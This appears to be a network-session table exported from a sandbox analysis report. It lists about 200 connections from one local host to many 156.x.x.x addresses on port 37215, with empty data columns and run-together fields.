                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29404192.168.2.1533262156.157.153.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29405192.168.2.1552408156.90.79.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29406192.168.2.1552874156.255.30.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29407192.168.2.1546008156.161.221.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29408192.168.2.1559946156.219.142.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29409192.168.2.1543568156.165.108.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29410192.168.2.1542580156.39.79.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29411192.168.2.1548576156.225.212.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29412192.168.2.1547106156.134.164.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29413192.168.2.1543524156.21.64.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29414192.168.2.1544486156.84.122.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29415192.168.2.1537990156.102.140.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29416192.168.2.1558814156.133.98.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29417192.168.2.1554488156.171.68.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29418192.168.2.1550994156.202.217.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29419192.168.2.1550252156.58.43.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29420192.168.2.1536954156.113.128.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29421192.168.2.1541686156.247.117.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29422192.168.2.1538146156.109.13.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29423192.168.2.1547906156.178.124.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29424192.168.2.1534954156.176.31.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29425192.168.2.1548816156.148.148.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29426192.168.2.1549886156.143.152.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29427192.168.2.1548282156.231.59.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29428192.168.2.1539520156.175.3.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29429192.168.2.1560620156.181.100.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29430192.168.2.1549682156.46.168.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29431192.168.2.1542178156.109.35.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29432192.168.2.1556502156.211.202.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29433192.168.2.1541874156.157.212.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29434192.168.2.1536390156.218.225.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29435192.168.2.1538248156.15.133.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29436192.168.2.1539636156.64.165.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29437192.168.2.1554908156.235.118.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29438192.168.2.1545936156.31.62.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29439192.168.2.1548368156.58.123.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29440192.168.2.1547814156.52.108.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29441192.168.2.1546622156.192.120.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29442192.168.2.1549232156.54.99.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29443192.168.2.1551780156.179.221.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29444192.168.2.1550288156.117.147.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29445192.168.2.1551280156.147.138.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29446192.168.2.1558874156.132.23.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29447192.168.2.1554984156.149.98.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29448192.168.2.1546180156.219.170.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29449192.168.2.1551192156.85.58.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29450192.168.2.1546294156.217.235.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29451192.168.2.1560590156.131.70.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29452192.168.2.1555510156.128.195.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29453192.168.2.1551172156.18.36.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29454192.168.2.1538662156.167.208.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29455192.168.2.1536006156.98.179.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29456192.168.2.1537334156.38.216.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29457192.168.2.1549570156.23.97.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29458192.168.2.1544028156.67.86.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29459192.168.2.1539512156.46.126.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29460192.168.2.1553016156.37.3.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29461192.168.2.1545870156.76.176.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29462192.168.2.1553766156.183.255.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29463192.168.2.1542572156.175.239.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29464192.168.2.1545202156.201.94.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29465192.168.2.1547280156.71.194.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29466192.168.2.1544184156.242.242.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29467192.168.2.1554738156.69.232.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29468192.168.2.1547264156.36.34.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29469192.168.2.1558120156.137.164.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29470192.168.2.1538332156.200.43.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29471192.168.2.1545172156.178.42.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29472192.168.2.1545384156.52.145.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29473192.168.2.1539456156.121.92.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29474192.168.2.1544656156.218.226.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29475192.168.2.1548756156.123.63.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29476192.168.2.1546298156.248.101.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29477192.168.2.1535344156.24.31.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29478192.168.2.1541682156.51.71.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29479192.168.2.1539650156.69.89.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29480192.168.2.1535800156.194.59.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29481192.168.2.1546690156.172.108.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29482192.168.2.1548254156.16.85.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29483192.168.2.1559192156.226.205.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29484192.168.2.1552428156.121.191.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29485192.168.2.1548826156.18.216.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29486192.168.2.1560290156.22.30.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29487192.168.2.1534288156.143.78.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29488192.168.2.1554500156.246.121.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29489192.168.2.1550962156.115.90.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29490192.168.2.1554668156.255.211.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29491192.168.2.1537240156.45.148.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29492192.168.2.1554446156.102.49.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29493192.168.2.1557118156.184.154.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29494192.168.2.1553146156.100.123.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29495192.168.2.1554492156.2.180.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29496192.168.2.1538960156.167.164.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29497192.168.2.1555894156.235.204.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29498192.168.2.1544992156.42.177.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29499192.168.2.1557718156.105.48.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29500192.168.2.1553580156.77.225.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29501192.168.2.1535576156.117.138.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29502192.168.2.1534640156.149.191.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29503192.168.2.1536394156.151.220.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29504192.168.2.1543430156.200.89.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29505192.168.2.1554240156.196.183.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29506192.168.2.1556746156.109.251.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29507192.168.2.1554428156.76.12.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29508192.168.2.1538088156.112.253.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29509192.168.2.1555594156.23.37.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29510192.168.2.1536286156.63.129.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29511192.168.2.1556618156.136.248.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29512192.168.2.1535412156.119.91.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29513192.168.2.1556126156.197.178.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29514192.168.2.1536398156.116.251.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29515192.168.2.1549242156.76.35.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29516192.168.2.1554516156.28.159.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29517192.168.2.1551146156.173.91.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29518192.168.2.1551656156.107.32.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29519192.168.2.1548710156.166.146.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29520192.168.2.1551994156.130.42.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29521192.168.2.1544346156.200.64.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29522192.168.2.1558690156.85.11.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29523192.168.2.1548736156.49.3.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29524192.168.2.1537352156.192.246.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29525192.168.2.1557772156.196.81.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29526192.168.2.1535400156.216.61.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29527192.168.2.1539114156.204.151.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29528192.168.2.1556920156.36.37.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29529192.168.2.1538372156.118.189.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29530192.168.2.1539832156.96.107.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29531192.168.2.1555324156.126.162.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29532192.168.2.1536958156.71.217.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29533192.168.2.1547204156.207.206.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29534192.168.2.1560718156.119.110.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29535192.168.2.1559818156.157.202.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29536192.168.2.1535862156.102.145.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29537192.168.2.1546386156.155.184.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29538192.168.2.1548112156.231.188.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29539192.168.2.1558276156.155.25.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29540192.168.2.1557316156.17.24.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29541192.168.2.1557932156.176.71.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29542192.168.2.1537882156.142.57.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29543192.168.2.1559828156.87.3.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29544192.168.2.1545524156.114.115.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29545192.168.2.1552166156.159.136.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29546192.168.2.1539476156.191.195.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29547192.168.2.1554484156.54.170.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29548192.168.2.1542752156.219.95.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29549192.168.2.1553790156.180.50.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29550192.168.2.1559126156.221.136.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29551192.168.2.1551002156.126.51.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29552192.168.2.1541572156.123.128.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29553192.168.2.1560910156.49.61.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29554192.168.2.1558376156.191.68.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29555192.168.2.1543636156.100.111.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29556192.168.2.1537784156.19.165.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29557192.168.2.1548084156.69.26.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29558192.168.2.1548154156.168.192.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29559192.168.2.1543574156.184.79.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29560192.168.2.1560624156.245.70.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29561192.168.2.1560050156.211.126.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29562192.168.2.1560410156.186.190.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29563192.168.2.1546270156.233.89.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29564192.168.2.1545306156.176.157.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29565192.168.2.1542476156.94.253.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29566192.168.2.1535730156.56.190.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29567192.168.2.1554078156.54.161.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29568192.168.2.1553426156.11.64.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29569192.168.2.1555184156.73.145.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29570192.168.2.1549656156.16.77.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29571192.168.2.1557856156.225.35.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29572192.168.2.1539484156.246.230.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29573192.168.2.1535996156.172.60.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29574192.168.2.1546680156.46.35.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29575192.168.2.1557260156.186.146.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29576192.168.2.1544576156.66.100.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29577192.168.2.1550994156.193.170.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29578192.168.2.1535368156.173.36.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29579192.168.2.1538144156.133.149.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29580192.168.2.1553130156.45.26.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29581192.168.2.1533990156.180.101.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29582192.168.2.1551542156.6.95.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29583192.168.2.1548656156.179.49.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29584192.168.2.1551110156.24.59.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29585192.168.2.1539198156.118.178.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29586192.168.2.1542440156.33.98.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29587192.168.2.1533030156.152.224.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29588192.168.2.1533144156.152.92.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29589192.168.2.1542784156.219.95.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29590192.168.2.1543786156.51.60.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29591192.168.2.1550582156.136.37.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29592192.168.2.1533830156.18.175.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29593192.168.2.1545272156.237.51.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29594192.168.2.1558426156.180.41.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29595192.168.2.1545002156.123.49.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29596192.168.2.1556416156.108.160.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29597192.168.2.1539696156.253.132.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29598192.168.2.1534596156.215.158.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29599192.168.2.1547452156.180.177.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29600192.168.2.1540632156.33.97.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29601192.168.2.1556624156.246.121.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29602192.168.2.1534030156.142.81.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29603192.168.2.1541402156.171.52.3637215
